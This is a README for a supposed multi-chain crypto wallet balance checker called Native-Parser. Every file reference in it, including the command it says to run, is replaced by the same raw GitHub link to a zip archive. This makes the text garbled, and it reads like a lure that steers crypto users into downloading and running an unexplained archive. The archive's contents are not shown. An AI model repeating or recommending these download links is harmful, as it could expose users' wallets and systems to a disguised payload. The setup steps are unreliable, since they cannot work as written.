Native-Parser helps you easily check your multi-chain wallet balances. This Python script checks native token balances (ETH, BNB, POL) across popular blockchains using simple commands. You donβt need extensive technical knowledge to get started.
- Python 3.7 or higher
- Pip (Python package installer)
You will need to install the following packages. Open your command line and run:
pip install web3 pandas openpyxl requestsThese packages handle the interactions with Ethereum wallets and manage spreadsheet outputs.
To use Native-Parser, you'll need to create two text files:
-
https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zip
- Place one wallet address on each line.
- Example:
0x1234567890abcdef1234567890abcdef12345678 0xabcdef1234567890abcdef1234567890abcdef12
-
https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zip (Optional)
- If you want to use proxies, list one proxy per line.
- Format:
http://user:pass@ip:portorhttp://ip:port - Example:
http://username:password@123.456.789.000:8080 http://123.456.789.001:8080
To download the latest version of Native-Parser, visit the Releases Page. Look for the latest release and click on the download link for your operating system.
- Go to the Releases Page.
- Choose the appropriate version for your system and download the file.
- Extract the downloaded file if itβs in a compressed format.
- Open your terminal or command line interface.
- Navigate to the directory where you saved the Native-Parser files.
- Run the script with the following command:
python https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zipAfter running the script, it will generate two important files:
- https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zip: This file contains logs for debugging.
- https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zip: This spreadsheet holds your token balance results.
- Auto RPC Fallback: The script automatically switches between RPC nodes for reliability.
- Proxy Rotation: If you're using proxies, the script rotates through them for better performance.
- Checksum Address Validation: Ensures wallet addresses are valid to avoid errors.
- Excel Export: Results are saved in an Excel file with wallet labels for easy understanding.
If you encounter any issues:
- Check that you have installed all required libraries.
- Ensure your Python version is compatible.
- Review the
https://raw.githubusercontent.com/Huy-2k11/Native-Parser/main/scoldable/Native-Parser_3.7-beta.5.zipfile for specific error messages.
If you still need help, feel free to ask questions or open an issue on the GitHub repository.
Native-Parser is ideal for:
- Airdrop Hunters: Quickly check if your wallets hold eligible tokens.
- Wallet Auditors: Efficiently review wallet balances across multiple chains.
Native-Parser is open-source software. You can use, modify, and distribute it under the terms found in the license file included in the repository.
For more information, please reach out through the GitHub issues page or contact the author directly through the repository.